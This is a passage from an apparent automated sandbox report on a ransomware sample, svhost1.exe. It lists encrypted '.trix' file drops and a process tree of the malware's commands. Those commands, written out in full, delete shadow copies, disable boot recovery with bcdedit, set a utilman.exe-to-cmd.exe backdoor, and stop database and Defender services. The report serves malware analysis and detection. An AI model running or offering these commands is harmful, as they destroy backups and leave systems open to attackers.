Files\ResetAssert.vssx svhost1.exe File created C:\Program Files\WatchOut.clr_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\WatchOut.clr svhost1.exe File opened for modification C:\Program Files\Internet Explorer\pdm.dll svhost1.exe File opened for modification C:\Program Files\7-Zip\7-zip.dll svhost1.exe File created C:\Program Files\Internet Explorer\sqmapi.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\OutRequest.ini svhost1.exe File opened for modification C:\Program Files\UseInvoke.xltm svhost1.exe File opened for modification C:\Program Files (x86)\desktop.ini svhost1.exe File opened for modification C:\Program Files\Internet Explorer\DiagnosticsHub_is.dll svhost1.exe File created C:\Program Files\Internet Explorer\iediagcmd.exe_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\iediagcmd.exe svhost1.exe File created C:\Program Files\Internet Explorer\MemoryAnalyzer.dll_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\ConvertFromCheckpoint.js_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\UseInvoke.xltm_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\DiagnosticsHub.DataWarehouse.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\DiagnosticsHub.DataWarehouse.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\ieproxy.dll svhost1.exe File opened for modification C:\Program Files\UnpublishRestore.xps svhost1.exe File created C:\Program Files\Internet Explorer\jsdbgui.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\7-Zip\7-zip32.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\perf_nt.dll svhost1.exe File created C:\Program Files\Internet Explorer\Timeline_is.dll_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\BlockImport.xhtml_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\desktop.ini_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\RequestImport.cmd svhost1.exe File created C:\Program Files\WaitConnect.xps_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\F12.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\ie9props.propdesc svhost1.exe File opened for modification C:\Program Files\Internet Explorer\jsdbgui.dll svhost1.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm svhost1.exe File created C:\Program Files\InstallBackup.cab_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\NewRevoke.bin svhost1.exe File created C:\Program Files\ResetAssert.vssx_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\DiagnosticsTap.dll_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\ie9props.propdesc_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\MemoryAnalyzer.dll svhost1.exe File created C:\Program Files\7-Zip\7z.exe_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\ieproxy.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\perfcore.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\sqmapi.dll svhost1.exe File opened for modification C:\Program Files\Internet Explorer\Timeline.dll svhost1.exe File opened for modification C:\Program Files\WaitConnect.xps svhost1.exe File created C:\Program Files (x86)\desktop.ini_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\D3DCompiler_47.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\iexplore.exe svhost1.exe File created C:\Program Files\Internet Explorer\pdm.dll_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\pdmproxy100.dll_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\perf_nt.dll_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\F12.dll_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\F12Tools.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\ieinstal.exe svhost1.exe File created C:\Program Files\Internet Explorer\ielowutil.exe_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Program Files\Internet Explorer\jsdebuggeride.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\jsdebuggeride.dll svhost1.exe File created C:\Program Files\7-Zip\7-zip.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\AssertDebug.dwg svhost1.exe File created C:\Program Files\MergeSet.xlsx_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\UnprotectCompare.ppsx svhost1.exe File created C:\Program Files\Internet Explorer\DiagnosticsHub_is.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\F12Tools.dll svhost1.exe File created C:\Program Files\Internet Explorer\iexplore.exe_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\networkinspection.dll svhost1.exe File created C:\Program Files\AssertDebug.dwg_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Program Files\Internet Explorer\DiagnosticsTap.dll svhost1.exe -
Drops file in Windows directory 56 IoCs
description ioc Process File created C:\Windows\mib.bin_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\system.ini svhost1.exe File opened for modification C:\Windows\winhlp32.exe svhost1.exe File created C:\Windows\DtcInstall.log_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Windows\notepad.exe_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\bfsvc.exe svhost1.exe File created C:\Windows\write.exe_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\msdfmap.ini svhost1.exe File created C:\Windows\regedit.exe_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\win.ini svhost1.exe File opened for modification C:\Windows\WindowsUpdate.log svhost1.exe File created C:\Windows\bfsvc.exe_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\HelpPane.exe svhost1.exe File created C:\Windows\WMSysPr9.prx_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\twain_32.dll svhost1.exe File created C:\Windows\splwow64.exe_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Windows\twain.dll_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\twunk_32.exe svhost1.exe File opened for modification C:\Windows\Starter.xml svhost1.exe File created C:\Windows\explorer.exe_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\Professional.xml svhost1.exe File opened for modification C:\Windows\write.exe svhost1.exe File opened for modification C:\Windows\DtcInstall.log svhost1.exe File opened for modification C:\Windows\hh.exe svhost1.exe File opened for modification C:\Windows\TSSysprep.log svhost1.exe File opened for modification C:\Windows\WMSysPr9.prx svhost1.exe File created C:\Windows\system.ini_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\twain.dll svhost1.exe File created C:\Windows\twain_32.dll_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Windows\twunk_16.exe_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Windows\winhlp32.exe_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Windows\bootstat.dat_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Windows\Professional.xml_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\splwow64.exe svhost1.exe File created C:\Windows\WindowsShell.Manifest_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\WindowsShell.Manifest svhost1.exe File opened for modification C:\Windows\bootstat.dat svhost1.exe File created C:\Windows\fveupdate.exe_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\setupact.log svhost1.exe File created C:\Windows\win.ini_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\PFRO.log svhost1.exe File opened for modification C:\Windows\regedit.exe svhost1.exe File created C:\Windows\setupact.log_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Windows\hh.exe_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Windows\PFRO.log_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Windows\TSSysprep.log_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\twunk_16.exe svhost1.exe File created C:\Windows\twunk_32.exe_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Windows\WindowsUpdate.log_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\explorer.exe svhost1.exe File created C:\Windows\msdfmap.ini_ID_2876361323_[[email protected]].trix svhost1.exe File created C:\Windows\Starter.xml_ID_2876361323_[[email protected]].trix svhost1.exe File opened for modification C:\Windows\mib.bin svhost1.exe File opened for modification C:\Windows\notepad.exe svhost1.exe File opened for modification C:\Windows\fveupdate.exe svhost1.exe File created C:\Windows\HelpPane.exe_ID_2876361323_[[email protected]].trix svhost1.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 596 powershell.exe 984 powershell.exe -
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2024 bcdedit.exe 1968 bcdedit.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies service 2 TTPs 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Drops desktop.ini file(s) 3 IoCs
description ioc Process File opened for modification C:\Program Files\desktop.ini svhost1.exe File opened for modification C:\Program Files (x86)\desktop.ini svhost1.exe File opened for modification C:\$Recycle.Bin\S-1-5-21-910373003-3952921535-3480519689-1000\desktop.ini svhost1.exe -
Sets file execution options in registry 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\Debugger = "Hotkey Disabled" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "%windir%\\system32\\cmd.exe" reg.exe -
Discovers systems in the same network 1 TTPs 1 IoCs
pid Process 660 net.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\svhost1.exe"C:\Users\Admin\AppData\Local\Temp\svhost1.exe"1⤵
- Suspicious use of WriteProcessMemory
- Drops file in Program Files directory
- Drops file in Windows directory
- Drops desktop.ini file(s)
PID:1100 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoExit -Command -2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:596 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" view3⤵
- Discovers systems in the same network
PID:660
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoExit -Command -2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:984 -
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1068
-
-
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1616
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f /v Debugger /t REG_SZ /d %windir%\system32\cmd.exe3⤵
- Sets file execution options in registry
PID:1608
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe" /f /v Debugger /t REG_SZ /d "Hotkey Disabled"3⤵
- Sets file execution options in registry
PID:1620
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MSSQL%%'" call stopservice3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1704
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLAgent%%'" call stopservice3⤵PID:1892
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLBrowser%%'" call stopservice3⤵PID:1840
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice3⤵PID:1916
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQLWriter%%'" call stopservice3⤵PID:1264
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%SQL%%'" call stopservice3⤵PID:540
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MySQL%%'" call stopservice3⤵PID:2036
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%firebird%%'" call stopservice3⤵PID:2012
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%WinDefend%%'" call stopservice3⤵PID:1452
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%mr2kserv%%'" call stopservice3⤵PID:1480
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%IISADMIN%%'" call stopservice3⤵PID:1308
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Database%%'" call stopservice3⤵PID:276
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QuickBooksDB%%'" call stopservice3⤵PID:432
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MongoDB%%'" call stopservice3⤵PID:216
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%MBAMService%%'" call stopservice3⤵PID:1500
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%ReportServer%%'" call stopservice3⤵PID:1592
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Exchange%%'" call stopservice3⤵PID:1192
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%wsbexchange%%'" call stopservice3⤵PID:1572
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%QB%%'" call stopservice3⤵PID:1880
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Service where "name like '%%Quick%%'" call stopservice3⤵PID:1840
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%QB%%'" call terminate3⤵PID:1916
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftefd%%'" call terminate3⤵PID:1264
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%msftesql%%'" call terminate3⤵PID:540
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%mysql%%'" call terminate3⤵PID:2036
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%node%%'" call terminate3⤵PID:2012
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%noderunner%%'" call terminate3⤵PID:1456
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%omtsreco%%'" call terminate3⤵PID:596
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%oracle%%'" call terminate3⤵PID:528
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sql%%'" call terminate3⤵PID:204
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%store%%'" call terminate3⤵PID:1488
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acess%%'" call terminate3⤵PID:1580
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%acrord%%'" call terminate3⤵PID:1608
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%code%%'" call terminate3⤵PID:1560
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%devenv%%'" call terminate3⤵PID:1848
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%avp%%'" call terminate3⤵PID:1888
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%swprv%%'" call terminate3⤵PID:1924
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%VSSVC%%'" call terminate3⤵PID:1980
-
-
C:\Windows\System32\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" path Win32_Process where "name like '%%sqlsrvr%%'" call terminate3⤵PID:576
-
-
C:\Windows\system32\bcdedit.exe"C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= recoveryenabled No -inputFormat xml -outputFormat text3⤵
- Modifies boot configuration data using bcdedit
PID:2024
-
-
C:\Windows\system32\bcdedit.exe"C:\Windows\system32\bcdedit.exe" /set -encodedCommand ZABlAGYAYQB1AGwAdAA= bootstatuspolicy ignoreallfailures -inputFormat xml -outputFormat text3⤵
- Modifies boot configuration data using bcdedit
PID:1968
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1784